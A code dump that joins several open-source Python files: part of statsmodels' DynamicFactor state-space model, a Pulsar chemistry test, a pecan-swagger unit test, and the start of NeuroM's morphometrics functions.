coefficient_matrices.ravel())
else:
unconstrained[self._params_factor_transition] = (
constrained[self._params_factor_transition])
# 5. Error transition VAR
# VAR transition: optionally force to be stationary
if self.enforce_stationarity and self.error_order > 0:
# Joint VAR specification
if self.error_var:
constrained_matrices = (
constrained[self._params_error_transition].reshape(
self.k_endog, self._error_order))
start = self.k_factors
end = self.k_factors + self.k_endog
cov = self.ssm['state_cov', start:end, start:end].real
coefficient_matrices, variance = (
unconstrain_stationary_multivariate(
constrained_matrices, cov))
unconstrained[self._params_error_transition] = (
coefficient_matrices.ravel())
# Separate AR specifications
else:
coefficients = (
constrained[self._params_error_transition].copy())
for i in range(self.k_endog):
start = i * self.error_order
end = (i + 1) * self.error_order
coefficients[start:end] = (
unconstrain_stationary_univariate(
coefficients[start:end]))
unconstrained[self._params_error_transition] = coefficients
else:
unconstrained[self._params_error_transition] = (
constrained[self._params_error_transition])
return unconstrained
def update(self, params, transformed=True, complex_step=False):
"""
Update the parameters of the model
Updates the representation matrices to fill in the new parameter
values.
Parameters
----------
params : array_like
Array of new parameters.
transformed : boolean, optional
Whether or not `params` is already transformed. If set to False,
            `transform_params` is called. Default is True.
Returns
-------
params : array_like
Array of parameters.
Notes
-----
Let `n = k_endog`, `m = k_factors`, and `p = factor_order`. Then the
`params` vector has length
:math:`[n \times m] + [n] + [m^2 \times p]`.
It is expanded in the following way:
- The first :math:`n \times m` parameters fill out the factor loading
matrix, starting from the [0,0] entry and then proceeding along rows.
These parameters are not modified in `transform_params`.
        - The next :math:`n` parameters provide variances for the observation
          error terms. They fill in the diagonal of the observation covariance
          matrix, and are constrained to be positive by `transform_params`.
- The next :math:`m^2 \times p` parameters are used to create the `p`
coefficient matrices for the vector autoregression describing the
factor transition. They are transformed in `transform_params` to
enforce stationarity of the VAR(p). They are placed so as to make
the transition matrix a companion matrix for the VAR. In particular,
we assume that the first :math:`m^2` parameters fill the first
coefficient matrix (starting at [0,0] and filling along rows), the
second :math:`m^2` parameters fill the second matrix, etc.
"""
params = super(DynamicFactor, self).update(
params, transformed=transformed, complex_step=complex_step)
# 1. Factor loadings
# Update the design / factor loading matrix
self.ssm[self._idx_loadings] = (
params[self._params_loadings].reshape(self.k_endog, self.k_factors)
)
# 2. Exog
if self.k_exog > 0:
exog_params = params[self._params_exog].reshape(
self.k_endog, self.k_exog).T
self.ssm[self._idx_exog] = np.dot(self.exog, exog_params).T
# 3. Error covariances
if self.error_cov_type in ['scalar', 'diagonal']:
self.ssm[self._idx_error_cov] = (
params[self._params_error_cov])
elif self.error_cov_type == 'unstructured':
error_cov_lower = np.zeros((self.k_endog, self.k_endog),
dtype=params.dtype)
error_cov_lower[self._idx_lower_error_cov] = (
params[self._params_error_cov])
self.ssm[self._idx_error_cov] = (
np.dot(error_cov_lower, error_cov_lower.T))
# 4. Factor transition VAR
self.ssm[self._idx_factor_transition] = (
params[self._params_factor_transition].reshape(
self.k_factors, self.factor_order * self.k_factors))
# 5. Error transition VAR
if self.error_var:
self.ssm[self._idx_error_transition] = (
params[self._params_error_transition].reshape(
self.k_endog, self._error_order))
else:
self.ssm[self._idx_error_transition] = (
params[self._params_error_transition])
class DynamicFactorResults(MLEResults):
"""
    Class to hold results from fitting a DynamicFactor model.
Parameters
----------
model : DynamicFactor instance
The fitted model instance
Attributes
----------
specification : dictionary
Dictionary including all attributes from the DynamicFactor model
instance.
coefficient_matrices_var : array
Array containing autoregressive lag polynomial coefficient matrices,
ordered from lowest degree to highest.
See Also
--------
statsmodels.tsa.statespace.kalman_filter.FilterResults
statsmodels.tsa.statespace.mlemodel.MLEResults
"""
def __init__(self, model, params, filter_results, cov_type='opg',
**kwargs):
super(DynamicFactorResults, self).__init__(model, params,
filter_results, cov_type,
**kwargs)
self.df_resid = np.inf # attribute required for wald tests
self.specification = Bunch(**{
# Model properties
'k_endog' : self.model.k_endog,
'enforce_stationarity': self.model.enforce_stationarity,
# Factor-related properties
'k_factors': self.model.k_factors,
'factor_order': self.model.factor_order,
# Error-related properties
'error_order': self.model.error_order,
'error_var': self.model.error_var,
'error_cov_type': self.model.error_cov_type,
# Other properties
'k_exog': self.model.k_exog
})
# Polynomials / coefficient matrices
self.coefficient_matrices_var = None
if self.model.factor_order > 0:
ar_params = (
np.array(self.params[self.model._params_factor_transition]))
k_factors = self.model.k_factors
factor_order = self.model.factor_order
self.coefficient_matrices_var = (
ar_params.reshape(k_factors * factor_order, k_factors).T
).reshape(k_factors, k_factors, factor_order).T
self.coefficient_matrices_error = None
if self.model.error_order > 0:
ar_params = (
np.array(self.params[self.model._params_error_transition]))
k_endog = self.model.k_endog
error_order = self.model.error_order
if self.model.error_var:
self.coefficient_matrices_error = (
ar_params.reshape(k_endog * error_order, k_endog).T
).reshape(k_endog, k_endog, error_order).T
else:
mat = np.zeros((k_endog, k_endog * error_order))
mat[self.model._idx_error_diag] = ar_params
self.coefficient_matrices_error = (
mat.T.reshape(error_order, k_endog, k_endog))
@property
def factors(self):
"""
Estimates of unobserved factors
Returns
-------
out: Bunch
Has the following attributes:
- `filtered`: a time series array with the filtered estimate of
the component
- `filtered_cov`: a time series array with the filtered estimate of
the variance/covariance of the component
- `smoothed`: a time series array with the smoothed estimate of
the component
- `smoothed_cov`: a time series array with the smoothed estimate of
the variance/covariance of the component
- `offset`: an integer giving the offset in the state vector where
this component begins
"""
        # If present, the factors are always the first components of the state vector
out = None
spec = self.specification
if spec.k_factors > 0:
offset = 0
end = spec.k_factors
res = self.filter_results
out = Bunch(
filtered=res.filtered_state[offset:end],
filtered_cov=res.filtered_state_cov[offset:end, offset:end],
smoothed=None, smoothed_cov=None,
offset=offset)
if self.smoothed_state is not None:
out.smoothed = self.smoothed_state[offset:end]
if self.smoothed_state_cov is not None:
out.smoothed_cov = (
self.smoothed_state_cov[offset:end, offset:end])
return out
@cache_readonly
def coefficients_of_determination(self):
"""
        Coefficients of determination (:math:`R^2`) from regressions of the
        individual endogenous variables on the estimated factors.
Returns
-------
coefficients_of_determination : array
A `k_endog` x `k_factors` array, where
`coefficients_of_determination[i, j]` represents the :math:`R^2`
            value from a regression of endogenous variable `i` on factor `j`
            and a constant.
Notes
-----
Although it can be difficult to interpret the estimated factor loadings
        and factors, it is often helpful to use the coefficients of
determination from univariate regressions to assess the importance of
each factor in explaining the variation in each endogenous variable.
In models with many variables and factors, this can sometimes lend
interpretation to the factors (for example sometimes one factor will
load primarily on real variables and another on nominal variables).
See Also
--------
plot_coefficients_of_determination
"""
from statsmodels.tools import add_constant
spec = self.specification
coefficients = np.zeros((spec.k_endog, spec.k_factors))
which = 'filtered' if self.smoothed_state is None else 'smoothed'
for i in range(spec.k_factors):
exog = add_constant(self.factors[which][i])
for j in range(spec.k_endog):
endog = self.filter_results.endog[j]
coefficients[j, i] = OLS(endog, exog).fit().rsquared
return coefficients
def plot_coefficients_of_determination(self, endog_labels=None,
fig=None, figsize=None):
"""
Plot the coefficients of determination
Parameters
----------
endog_labels : boolean, optional
Whether or not to label the endogenous variables along the x-axis
of the plots. Default is to include labels if there are 5 or fewer
endogenous variables.
fig : Matplotlib Figure instance, optional
If given, subplots are created in this figure instead of in a new
figure. Note that the grid will be created in the provided
figure using `fig.add_subplot()`.
figsize : tuple, optional
If a figure is created, this argument allows specifying a size.
The tuple is (width, height).
Notes
-----
Produces a `k_factors` x 1 plot grid. The `i`th plot shows a bar plot
of the coefficients of determination associated with factor `i`. The
endogenous variables are arranged along the x-axis according to their
position in the `endog` array.
See Also
--------
coefficients_of_determination
"""
from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
_import_mpl()
fig = create_mpl_fig(fig, figsize)
spec = self.specification
# Should we label endogenous variables?
if endog_labels is None:
endog_labels = spec.k_endog <= 5
# Plot the coefficients of determination
coefficients_of_determination = self.coefficients_of_determination
plot_idx = 1
locations = np.arange(spec.k_endog)
for coeffs in coefficients_of_determination.T:
# Create the new axis
ax = fig.add_subplot(spec.k_factors, 1, plot_idx)
ax.set_ylim((0,1))
ax.set(title='Factor %i' % plot_idx, ylabel=r'$R^2$')
bars = ax.bar(locations, coeffs)
if endog_labels:
width = bars[0].get_width()
ax.xaxis.set_ticks(locations + width / 2)
ax.xaxis.set_ticklabels(self.model.endog_names)
else:
ax.set(xlabel='Endogenous variables')
ax.xaxis.set_ticks([])
plot_idx += 1
return fig
def predict(self, start=None, end=None, exog=None, dynamic=False,
**kwargs):
"""
In-sample prediction and out-of-sample forecasting
Parameters
----------
start : int, str, or datetime, optional
            Zero-indexed observation number at which to start forecasting,
            i.e., the first forecast is start. Can also be a date string to
            parse or a datetime type. Default is the zeroth observation.
end : int, str, or datetime, optional
            Zero-indexed observation number at which to end forecasting,
            i.e., the last forecast is end. Can also be a date string to
parse or a datetime type. However, if the dates index does not
have a fixed frequency, end must be an integer index if you
want out of sample prediction. Default is the last observation in
the sample.
exog : array_like, optional
If the model includes exogenous regressors, you must provide
exactly enough out-of-sample values for the exogenous variables if
end is beyond the last observation in the sample.
dynamic : boolean, int, str, or datetime, optional
Integer offset relative to `start` at which to begin dynamic
prediction. Can also be an absolute date string to parse or a
datetime type (these are not interpreted as offsets).
Prior to this observation, true endogenous values will be used for
prediction; starting with this observation and continuing through
the end of prediction, forecasted endogenous values will be used
instead.
**kwargs
            Additional arguments may be required for forecasting beyond the end
of the sample. See `FilterResults.predict` for more details.
Returns
-------
forecast : array
Array of out of sample forecasts.
"""
if start is None:
start = 0
# Handle end (e.g. date)
_start = self.model._get_predict_start(start)
_end, _out_of_sample = self.model._get_predict_end(end)
# Handle exogenous parameters
if _out_of_sample and self.model.k_exog > 0:
            # Create a new faux DynamicFactor model for the extended dataset
nobs = self.model.data.orig_endog.shape[0] + _out_of_sample
endog = np.zeros((nobs, self.model.k_endog))
if self.model.k_exog > 0:
if exog is None:
raise ValueError('Out-of-sample forecasting in a model'
' with a regression component requires'
' additional exogenous values via the'
' `exog` argument.')
exog = np.array(exog)
required_exog_shape = (_out_of_sample, self.model.k_exog)
if not exog.shape == required_exog_shape:
raise ValueError('Provided exogenous values are not of the'
' appropriate shape. Required %s, got %s.'
% (str(required_exog_shape),
str(exog.shape)))
exog = np.c_[self.model.data.orig_exog.T, exog.T].T
# TODO replace with init_kwds or specification or similar
model = DynamicFactor(
endog,
k_factors=self.model.k_factors,
factor_order=self.model.factor_order,
exog=exog,
error_order=self.model.error_order,
error_var=self.model.error_var,
error_cov_type=self.model.error_cov_type,
enforce_stationarity=self.model.enforce_stationarity
)
model.update(self.params)
            # Set the kwargs with the updated time-varying state space
            # representation matrices
for name in self.filter_results.shapes.keys():
if name == 'obs':
continue
mat = getattr(model.ssm, name)
if mat.shape[-1] > 1:
if len(mat.shape) == 2:
kwargs[name] = mat[:, -_out_of_sample:]
else:
kwargs[name] = mat[:, :, -_out_of_sample:]
elif self.model.k_exog == 0 and exog is not None:
warn('Exogenous array provided to predict, but additional data not'
' required. `exog` argument ignored.', ValueWarning)
return super(DynamicFactorResults, self).predict(
start=start, end=end, exog=exog, dynamic=dynamic, **kwargs
)
def forecast(self, steps=1, exog=None, **kwargs):
"""
Out-of-sample forecasts
Parameters
----------
steps : int, optional
The number of out of sample forecasts from the end of the
sample. Default is 1.
exog : array_like, optional
If the model includes exogenous regressors, you must provide
exactly enough out-of-sample values for the exogenous variables for
each step forecasted.
**kwargs
Additional arguments may be required for forecasting beyond the end
of the sample. See `FilterResults.predict` for more details.
Returns
-------
forecast : array
Array of out of sample forecasts.
"""
return super(DynamicFactorResults, self).forecast(steps, exog=exog,
**kwargs)
def summary(self, alpha=.05, start=None, separate_params=True):
from statsmodels.iolib.summary import summary_params
spec = self.specification
# Create the model name
model_name = []
if spec.k_factors > 0:
if spec.factor_order > 0:
model_type = ('DynamicFactor(factors=%d, order=%d)' %
(spec.k_factors, spec.factor_order))
else:
model_type = 'StaticFactor(factors=%d)' % spec.k_factors
model_name.append(model_type)
if spec.k_exog > 0:
model_name.append('%d regressors' % spec.k_exog)
else:
model_name.append('SUR(%d regressors)' % spec.k_exog)
if spec.error_order > 0:
error_type = 'VAR' if spec.error_var else 'AR'
model_name.append('%s(%d) errors' % (error_type, spec.error_order))
summary = super(DynamicFactorResults, self).summary(
alpha=alpha, start=start, model_name=model_name,
display_params=not separate_params
)
if separate_params:
indices = np.arange(len(self.params))
def make_table(self, mask, title, strip_end=True):
res = (self, self.params[mask], self.bse[mask],
self.zvalues[mask], self.pvalues[mask],
self.conf_int(alpha)[mask])
param_names = [
'.'.join(name.split('.')[:-1]) if strip_end else name
for name in
np.array(self.data.param_names)[mask].tolist()
]
return summary_params(res, yname=None, xname=param_names,
alpha=alpha, use_t=False, title=title)
k_endog = self.model.k_endog
k_exog = self.model.k_exog
k_factors = self.model.k_factors
factor_order = self.model.factor_order
_factor_order = self.model._factor_order
_error_order = self.model._error_order
# Add parameter tables for each endogenous variable
loading_indices = indices[self.model._params_loadings]
loading_masks = []
exog_indices = indices[self.model._params_exog]
exog_masks = []
for i in range(k_endog):
offset = 0
# 1. Factor loadings
# Recall these are in the form:
# 'loading.f1.y1', 'loading.f2.y1', 'loading.f1.y2', ...
loading_mask = (
loading_indices[i * k_factors:(i + 1) * k_factors])
loading_masks.append(loading_mask)
# 2. Exog
# Recall these are in the form:
# beta.x1.y1, beta.x2.y1, beta.x1.y2, ...
exog_mask = exog_indices[i * k_exog:(i + 1) * k_exog]
exog_masks.append(exog_mask)
# Create the table
mask = np.concatenate([loading_mask, exog_mask])
title = "Results for equation %s" % self.model.endog_names[i]
table = make_table(self, mask, title)
summary.tables.append(table)
# Add parameter tables for each factor
factor_indices = indices[self.model._params_factor_transition]
factor_masks = []
if factor_order > 0:
for i in range(k_factors):
start = i * _factor_order
factor_mask = factor_indices[start: start + _factor_order]
factor_masks.append(factor_mask)
# Create the table
title = "Results for factor equation f%d" % (i+1)
table = make_table(self, factor_mask, title)
summary.tables.append(table)
# Add parameter tables for error transitions
error_masks = []
if spec.error_order > 0:
error_indices = indices[self.model._params_error_transition]
for i in range(k_endog):
if spec.error_var:
start = i * _error_order
end = (i + 1) * _error_order
else:
start = i * spec.error_order
end = (i + 1) * spec.error_order
error_mask = error_indices[start:end]
error_masks.append(error_mask)
# Create the table
title = ("Results for error equation e(%s)" %
self.model.endog_names[i])
table = make_table(self, error_mask, title)
summary.tables.append(table)
# Error covariance terms
error_cov_mask = indices[self.model._params_error_cov]
table = make_table(self, error_cov_mask,
"Error covariance matrix", strip_end=False)
summary.tables.append(table)
# Add a table for all other parameters
masks = []
for m in (loading_masks, exog_masks, factor_masks,
error_masks, [error_cov_mask]):
m = np.array(m).flatten()
if len(m) > 0:
masks.append(m)
masks = np.concatenate(masks)
inverse_mask = np.array(list(set(indices).difference(set(masks))))
if len(inverse_mask) > 0:
table = make_table(self, inverse_mask, "Other parameters",
strip_end=False)
summary.tables.append(table)
return summary
summary.__doc__ = MLEResults.summary.__doc__
class DynamicFactorResultsWrapper(MLEResultsWrapper):
_attrs = {}
_wrap_attrs = wrap.union_dicts(MLEResultsWrapper._wrap_attrs,
_attrs)
_methods = {}
_wrap_methods = wrap.union_dicts(MLEResultsWrapper._wrap_methods,
_methods)
wrap.populate_wrapper(DynamicFactorResultsWrapper, DynamicFactorResults)
|
phobson/statsmodels
|
statsmodels/tsa/statespace/dynamic_factor.py
|
Python
|
bsd-3-clause
| 57,954
|
#!/usr/bin/env python3
import os
import sys
import traceback
thispath = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(os.path.dirname(thispath),"helper"))
from MiscFxns import *
from StandardModules import *
import pulsar_psi4
def ApplyBasis(syst,bsname,bslabel="primary"):
return psr.system.apply_single_basis(bslabel,bsname,syst)
def CompareEgy(EgyIn):
return abs(EgyIn+224.89287653924677)<0.00001
def CompareGrad(GradIn):
CorrectGrad=[
-0.000988976949000001, 0.0004443157829999993, 0.05238342271999999,
0.018237358511, -0.002547005771, -0.030731839919000005,
-0.02344281975, -0.0062568701740000005, -0.025360880303,
-0.015409293889000001, -0.047382578540999996, -0.012807191666999996,
0.016869055227000003, 0.024963490952999996, -0.017442968207000004,
0.007207092293000001, 0.025306999363999997, 0.023850402741000004,
0.019786523729999998, 0.04038960502300001, -0.028509120090000006,
-0.026869925129, -0.022975320699000004, 0.005627050168,
0.004610985953999999, -0.011942635934, 0.032991124551000006]
AllGood=True
for i in range(0,len(CorrectGrad)):
AllGood=AllGood and abs(CorrectGrad[i]-GradIn[i])<0.00001
return AllGood
def Run(mm):
try:
tester = psr.testing.Tester("Testing Boys and Bernardi CP")
tester.print_header()
pulsar_psi4.pulsar_psi4_setup(mm)
LoadDefaultModules(mm)
mm.change_option("PSI4_SCF","BASIS_SET","sto-3g")
mm.change_option("PSR_CP","METHOD","PSI4_SCF")
mm.change_option("PSR_MBE","METHOD","PSI4_SCF")
mm.change_option("PSI4_SCF","PRINT",0)
mol=psr.system.make_system("""
0 1
O 1.2361419 1.0137761 -0.0612424
H 0.5104418 0.8944555 0.5514190
H 1.9926927 1.1973129 0.4956931
O -0.9957202 0.0160415 1.2422556
H -1.4542703 -0.5669741 1.8472817
H -0.9377950 -0.4817912 0.4267562
O -0.2432343 -1.0198566 -1.1953808
H 0.4367536 -0.3759433 -0.9973297
H -0.5031835 -0.8251492 -2.0957959
""")
mol = ApplyBasis(mol,"sto-3g","sto-3g")
wfn=psr.datastore.Wavefunction()
wfn.system=mol
MyMod=mm.get_module("PSR_CP",0)
NewWfn,Egy=MyMod.deriv(0,wfn)
tester.test("Testing CP Energy via Deriv(0)", True, CompareEgy, Egy[0])
NewWfn,Egy=MyMod.energy(wfn)
tester.test("Testing CP Energy via Energy()", True, CompareEgy, Egy)
NewWfn,Egy=MyMod.deriv(1,wfn)
tester.test("Testing CP Gradient via Deriv(1)", True, CompareGrad, Egy)
NewWfn,Egy=MyMod.gradient(wfn)
tester.test("Testing CP Gradient via Gradient()", True, CompareGrad, Egy)
tester.print_results()
except Exception as e:
psr.output.Output("Caught exception in main handler\n")
traceback.print_exc()
with psr.ModuleAdministrator() as mm:
Run(mm)
psr.finalize()
|
pulsar-chem/Pulsar-Core
|
test/old/Old2/modules/CP.py
|
Python
|
bsd-3-clause
| 2,969
|
import unittest
from pecan_swagger import utils
class TestUtils(unittest.TestCase):
def test_swagger_build(self):
from .resources import example_app
expected = {
"swagger": "2.0",
"info": {
"version": "1.0",
"title": "example_app"
},
"produces": [],
"consumes": [],
"paths": {
"/api": {
"get": {}
},
"/messages": {
"get": {},
"post": {}
},
"/profile": {
"get": {},
"post": {}
},
"/profile/image": {
"get": {},
"post": {}
},
"/profile/stats": {
"get": {}
}
}
}
actual = utils.swagger_build('example_app', '1.0')
self.assertDictEqual(expected, actual)
def test_swagger_build_wsme(self):
from .resources import example_wsme_app
expected = \
{
"consumes": [],
"info": {
"title": "example_wsme_app",
"version": "1.0"
},
"paths": {
"/api": {
"get": {}
},
"/messages": {
"get": {},
"post": {}
},
"/profile": {
"get": {},
"post": {}
},
"/profile/image": {
"get": {},
"post": {}
},
"/profile/stats": {
"get": {}
},
"/wsmemessages": {
"get": {
"description": "",
"parameters": [],
"responses": {
200: {
"description": "",
"schema": {
"items": {
"items": {
"properties": {
"id": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message_from": {
"enum": [
'1.OSOMATSU',
'2.KARAMATSU',
'3.CHOROMATSU',
'4.ICHIMATSU',
'5.JUSHIMATSU',
'6.TODOMATSU'
],
"type": "string"
},
"message_size": {
"minimum": 1,
"type": "integer"
}
}
},
"type": "object"
},
"type": "array"
}
}
}
},
"post": {
"description": "",
"parameters": [
{
"in": "query",
"name": "message",
"required": True,
"type": "string"
}
],
"responses": {
201: {
"description": "",
"schema": {
"items": {
"properties": {
"id": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message_from": {
"enum": [
'1.OSOMATSU',
'2.KARAMATSU',
'3.CHOROMATSU',
'4.ICHIMATSU',
'5.JUSHIMATSU',
'6.TODOMATSU'
],
"type": "string"
},
"message_size": {
"minimum": 1,
"type": "integer"
}
}
},
"type": "object"
}
}
}
}
},
"/wsmemessages/<specifier>": {
"delete": {
"description": "",
"parameters": [
{
"in": "query",
"name": "id",
"required": True,
"type": "string"
}
],
"responses": {
204: {
"description": ""
}
}
},
"get": {
"description": "",
"parameters": [
{
"in": "query",
"name": "id",
"required": True,
"type": "string"
}
],
"responses": {
200: {
"description": "",
"schema": {
"items": {
"properties": {
"id": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message_from": {
"enum": [
'1.OSOMATSU',
'2.KARAMATSU',
'3.CHOROMATSU',
'4.ICHIMATSU',
'5.JUSHIMATSU',
'6.TODOMATSU'
],
"type": "string"
},
"message_size": {
"minimum": 1,
"type": "integer"
}
}
},
"type": "object"
}
}
}
}
},
"/wsmemessages/detail": {
"get": {
"description": "",
"parameters": [
{
"in": "query",
"name": "id",
"required": True,
"type": "string"
}
],
"responses": {
200: {
"description": "",
"schema": {
"items": {
"properties": {
"id": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message_from": {
"enum": [
'1.OSOMATSU',
'2.KARAMATSU',
'3.CHOROMATSU',
'4.ICHIMATSU',
'5.JUSHIMATSU',
'6.TODOMATSU'
],
"type": "string"
},
"message_size": {
"minimum": 1,
"type": "integer"
}
}
},
"type": "object"
}
}
}
}
}
},
"produces": [],
"swagger": "2.0"
}
actual = utils.swagger_build('example_wsme_app', '1.0')
import codecs, json
fout = codecs.open('example_wsme_app.json', 'w', 'utf_8')
json.dump(actual, fout, sort_keys=True, indent=2)
self.maxDiff = None
self.assertDictEqual(expected, actual)
|
shu-mutou/pecan-swagger
|
tests/test_utils.py
|
Python
|
bsd-3-clause
| 10,382
|
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Morphometrics functions for neurons or neuron populations'''
import math
import numpy as np
from neurom.geom import bounding_box
from neurom.core.types import NeuriteType
from neurom.core.types import tree_type_checker as is_type
from neurom.core.dataformat import COLS
from neurom.core._neuron import iter_neurites, iter_segments
from neurom import morphmath
def neuron_population(nrns):
'''Makes sure `nrns` behaves like a neuron population'''
return nrns.neurons if hasattr(nrns, 'neurons') else (nrns,)
def soma_volume(nrn):
'''Get the volume of a neuron's soma.'''
return nrn.soma.volume
def soma_volumes(nrn_pop):
'''Get the volume of the somata in a population of neurons
Note:
If a single neuron is passed, a single element list with the volume
of its soma member is returned.
'''
nrns = neuron_population(nrn_pop)
return [soma_volume(n) for n in nrns]
def soma_surface_area(nrn, neurite_type=NeuriteType.soma):
'''Get the surface area of a neuron's soma.
Note:
The surface area is calculated by assuming the soma is spherical.
'''
assert neurite_type == NeuriteType.soma, 'Neurite type must be soma'
return 4 * math.pi * nrn.soma.radius ** 2
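# Worked example of the spherical assumption above: a soma with radius 2 um
# has surface area 4 * pi * 2 ** 2, i.e. roughly 50.27 um^2.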
def soma_surface_areas(nrn_pop, neurite_type=NeuriteType.soma):
'''Get the surface areas of the somata in a population of neurons
Note:
The surface area is calculated by assuming the soma is spherical.
Note:
If a single neuron is passed, a single element list with the surface
area of its soma member is returned.
'''
nrns = neuron_population(nrn_pop)
assert neurite_type == NeuriteType.soma, 'Neurite type must be soma'
return [soma_surface_area(n) for n in nrns]
def soma_radii(nrn_pop, neurite_type=NeuriteType.soma):
''' Get the radii of the somata of a population of neurons
Note:
If a single neuron is passed, a single element list with the
radius of its soma member is returned.
'''
assert neurite_type == NeuriteType.soma, 'Neurite type must be soma'
nrns = neuron_population(nrn_pop)
return [n.soma.radius for n in nrns]
def trunk_section_lengths(nrn, neurite_type=NeuriteType.all):
'''list of lengths of trunk sections of neurites in a neuron'''
neurite_filter = is_type(neurite_type)
return [morphmath.section_length(s.root_node.points)
for s in nrn.neurites if neurite_filter(s)]
def trunk_origin_radii(nrn, neurite_type=NeuriteType.all):
'''radii of the trunk sections of neurites in a neuron'''
neurite_filter = is_type(neurite_type)
return [s.root_node.points[0][COLS.R] for s in nrn.neurites if neurite_filter(s)]
def trunk_origin_azimuths(nrn, neurite_type=NeuriteType.all):
'''Get a list of all the trunk origin azimuths of a neuron or population
The azimuth is defined as the angle between the x-axis and the vector
defined by (initial tree point - soma center) on the x-z plane.
The azimuth angle lies in the range [-pi, pi] radians.
'''
neurite_filter = is_type(neurite_type)
nrns = neuron_population(nrn)
def _azimuth(section, soma):
'''Azimuth of a section'''
vector = morphmath.vector(section[0], soma.center)
return np.arctan2(vector[COLS.Z], vector[COLS.X])
return [_azimuth(s.root_node.points, n.soma)
for n in nrns
for s in n.neurites if neurite_filter(s)]
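# Worked example (hypothetical coordinates): per the definition above, a trunk
# whose first point lies at soma_center + (1, 0, 1) gives vector (1, 0, 1), so
# its azimuth is arctan2(1, 1) = pi/4 radians.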
def trunk_origin_elevations(nrn, neurite_type=NeuriteType.all):
'''Get a list of all the trunk origin elevations of a neuron or population
The elevation is defined as the angle between the x-axis and the
vector defined by (initial tree point - soma center)
on the x-y half-plane.
The elevation angle lies in the range [-pi/2, pi/2] radians.
'''
neurite_filter = is_type(neurite_type)
nrns = neuron_population(nrn)
def _elevation(section, soma):
'''Elevation of a section'''
vector = morphmath.vector(section[0], soma.center)
norm_vector = np.linalg.norm(vector)
if norm_vector >= np.finfo(type(norm_vector)).eps:
return np.arcsin(vector[COLS.Y] / norm_vector)
raise ValueError("Norm of vector between soma center and section is almost zero.")
return [_elevation(s.root_node.points, n.soma)
for n in nrns
for s in n.neurites if neurite_filter(s)]
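# Worked example (hypothetical coordinates): per the definition above, a
# vector of (1, 1, 0) from the soma center has norm sqrt(2) and elevation
# arcsin(1 / sqrt(2)) = pi/4 radians.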
def trunk_vectors(nrn, neurite_type=NeuriteType.all):
'''Calculates the vectors between all the trunks of the neuron
and the soma center.
'''
neurite_filter = is_type(neurite_type)
nrns = neuron_population(nrn)
return np.array([morphmath.vector(s.root_node.points[0], n.soma.center)
for n in nrns
for s in n.neurites if neurite_filter(s)])
def trunk_angles(nrn, neurite_type=NeuriteType.all):
'''Calculates the angles between all the trunks of the neuron.
The angles are defined on the x-y plane and the trees
are sorted starting from the y-axis, proceeding anticlockwise.
'''
vectors = trunk_vectors(nrn, neurite_type=neurite_type)
# In order to avoid the failure of the process in case the neurite_type does not exist
if not vectors.size:
return []
def _sort_angle(p1, p2):
"""Angle between p1-p2 to sort vectors"""
ang1 = np.arctan2(*p1[::-1])
ang2 = np.arctan2(*p2[::-1])
return (ang1 - ang2)
# Sorting angles according to x-y plane
order = np.argsort(np.array([_sort_angle(i / np.linalg.norm(i), [0, 1])
for i in vectors[:, 0:2]]))
ordered_vectors = vectors[order][:, [COLS.X, COLS.Y]]
return [morphmath.angle_between_vectors(ordered_vectors[i], ordered_vectors[i - 1])
for i, _ in enumerate(ordered_vectors)]
def sholl_crossings(neurites, center, radii):
'''Calculate crossings of neurites with concentric circles
Args:
neurites: neurites on which to perform the Sholl analysis
center(point): center of the concentric circles
radii(iterable of floats): radii for which crossings will be counted
Returns:
Array of same length as radii, with a count of the number of crossings
for the respective radius
'''
def _count_crossings(neurite, radius):
'''Count crossings of segments in neurite with a circle of the given radius'''
r2 = radius ** 2
count = 0
for start, end in iter_segments(neurite):
start_dist2, end_dist2 = (morphmath.point_dist2(center, start),
morphmath.point_dist2(center, end))
count += int(start_dist2 <= r2 <= end_dist2 or
end_dist2 <= r2 <= start_dist2)
return count
return np.array([sum(_count_crossings(neurite, r)
for neurite in iter_neurites(neurites))
for r in radii])
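# Minimal usage sketch (``nrn`` here is a hypothetical loaded morphology):
#
#     radii = np.arange(10, 100, 10)
#     crossings = sholl_crossings(nrn.neurites, nrn.soma.center, radii)
#     # crossings[i] counts segments crossing the circle of radius radii[i]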
def sholl_frequency(nrn, neurite_type=NeuriteType.all, step_size=10):
'''perform Sholl frequency calculations on a population of neurites
Args:
nrn(morph): neuron or population
neurite_type(NeuriteType): which neurites to operate on
step_size(float): step size between Sholl radii
Note:
